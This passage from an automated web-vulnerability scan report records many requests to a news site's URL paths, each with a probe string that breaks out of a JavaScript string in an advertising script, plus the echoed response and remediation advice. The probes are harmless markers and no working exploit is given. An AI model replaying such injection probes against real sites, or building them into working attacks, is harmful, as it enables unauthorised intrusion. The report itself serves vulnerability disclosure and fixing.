GET /blog2a5c6"%3b8a2ba5e08a/inside-politics/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14731
Date: Mon, 13 Dec 2010 21:26:22 GMT
X-Varnish: 570575089
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="blog2a5c6";8a2ba5e08a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7acb4"%3b18b40a71e01 was submitted in the REST URL parameter 1. This input was echoed as 7acb4";18b40a71e01 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture7acb4"%3b18b40a71e01/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14583
Date: Mon, 13 Dec 2010 21:33:10 GMT
X-Varnish: 570583294
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture7acb4";18b40a71e01"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abed6'%3bb088e9b90c9 was submitted in the REST URL parameter 1. This input was echoed as abed6';b088e9b90c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cultureabed6'%3bb088e9b90c9/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14610
Date: Mon, 13 Dec 2010 21:33:25 GMT
X-Varnish: 570583883
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41fe8'%3be3c1f7b0d5a was submitted in the REST URL parameter 1. This input was echoed as 41fe8';e3c1f7b0d5a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture41fe8'%3be3c1f7b0d5a/entertainment/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:33:11 GMT
X-Varnish: 570583332
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16d1"%3b47ced2227c0 was submitted in the REST URL parameter 1. This input was echoed as f16d1";47ced2227c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturef16d1"%3b47ced2227c0/entertainment/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14569
Date: Mon, 13 Dec 2010 21:32:40 GMT
X-Varnish: 570582914
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culturef16d1";47ced2227c0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85e79'%3b5604df38ad8 was submitted in the REST URL parameter 1. This input was echoed as 85e79';5604df38ad8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture85e79'%3b5604df38ad8/gift-guide/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:34:02 GMT
X-Varnish: 570584602
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34565"%3b2a99bf3ed93 was submitted in the REST URL parameter 1. This input was echoed as 34565";2a99bf3ed93 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture34565"%3b2a99bf3ed93/gift-guide/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14569
Date: Mon, 13 Dec 2010 21:33:42 GMT
X-Varnish: 570584288
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture34565";2a99bf3ed93"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf5e"%3b26c20f51f8b was submitted in the REST URL parameter 1. This input was echoed as faf5e";26c20f51f8b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturefaf5e"%3b26c20f51f8b/home-living/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:33:17 GMT
X-Varnish: 570583472
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culturefaf5e";26c20f51f8b"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f11a1'%3b190d1711d51 was submitted in the REST URL parameter 1. This input was echoed as f11a1';190d1711d51 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturef11a1'%3b190d1711d51/home-living/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:33:40 GMT
X-Varnish: 570584254
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2ad'%3b9c270c6ce97 was submitted in the REST URL parameter 1. This input was echoed as cd2ad';9c270c6ce97 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturecd2ad'%3b9c270c6ce97/technology/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:33:09 GMT
X-Varnish: 570583260
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247b"%3bb66b6571254 was submitted in the REST URL parameter 1. This input was echoed as 8247b";b66b6571254 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture8247b"%3bb66b6571254/technology/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14751
Date: Mon, 13 Dec 2010 21:32:35 GMT
X-Varnish: 570582785
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture8247b";b66b6571254"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad218'%3bda6d13205cc was submitted in the REST URL parameter 1. This input was echoed as ad218';da6d13205cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturead218'%3bda6d13205cc/the-list/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14768
Date: Mon, 13 Dec 2010 21:34:11 GMT
X-Varnish: 570585060
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ae67"%3b0b96abee831 was submitted in the REST URL parameter 1. This input was echoed as 1ae67";0b96abee831 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture1ae67"%3b0b96abee831/the-list/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:33:59 GMT
X-Varnish: 570584779
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture1ae67";0b96abee831"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4857"%3be27ffee5031 was submitted in the REST URL parameter 1. This input was echoed as b4857";e27ffee5031 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cultureb4857"%3be27ffee5031/travel/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:32:41 GMT
X-Varnish: 570582940
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="cultureb4857";e27ffee5031"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f67d'%3b02dd9b7c247 was submitted in the REST URL parameter 1. This input was echoed as 7f67d';02dd9b7c247 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture7f67d'%3b02dd9b7c247/travel/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:33:26 GMT
X-Varnish: 570583644
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a5b8"%3b0ca217d819c was submitted in the REST URL parameter 1. This input was echoed as 2a5b8";0ca217d819c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer-service2a5b8"%3b0ca217d819c/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14772
Date: Mon, 13 Dec 2010 21:39:08 GMT
X-Varnish: 570592408
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... dow.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="customer-service2a5b8";0ca217d819c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4f2'%3b00651201ea was submitted in the REST URL parameter 1. This input was echoed as ac4f2';00651201ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer-serviceac4f2'%3b00651201ea/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14784
Date: Mon, 13 Dec 2010 21:39:13 GMT
X-Varnish: 570592631
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a77a6"%3b89bfe69d81d was submitted in the REST URL parameter 1. This input was echoed as a77a6";89bfe69d81d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feedsa77a6"%3b89bfe69d81d/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14535
Date: Mon, 13 Dec 2010 21:37:59 GMT
X-Varnish: 570590790
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="feedsa77a6";89bfe69d81d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 892fc'%3b44a337dbe39 was submitted in the REST URL parameter 1. This input was echoed as 892fc';44a337dbe39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feeds892fc'%3b44a337dbe39/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:38:00 GMT
X-Varnish: 570590847
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3edc6'%3b03c70d0c094 was submitted in the REST URL parameter 1. This input was echoed as 3edc6';03c70d0c094 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia3edc6'%3b03c70d0c094/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:34:31 GMT
X-Varnish: 570585502
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7353e"%3bd90542642a3 was submitted in the REST URL parameter 1. This input was echoed as 7353e";d90542642a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia7353e"%3bd90542642a3/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14789
Date: Mon, 13 Dec 2010 21:34:11 GMT
X-Varnish: 570585046
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia7353e";d90542642a3"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94227'%3ba6892be58e4 was submitted in the REST URL parameter 1. This input was echoed as 94227';a6892be58e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia94227'%3ba6892be58e4/collection/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:34:02 GMT
X-Varnish: 570584840
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ee5"%3b213eb5b013a was submitted in the REST URL parameter 1. This input was echoed as f4ee5";213eb5b013a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
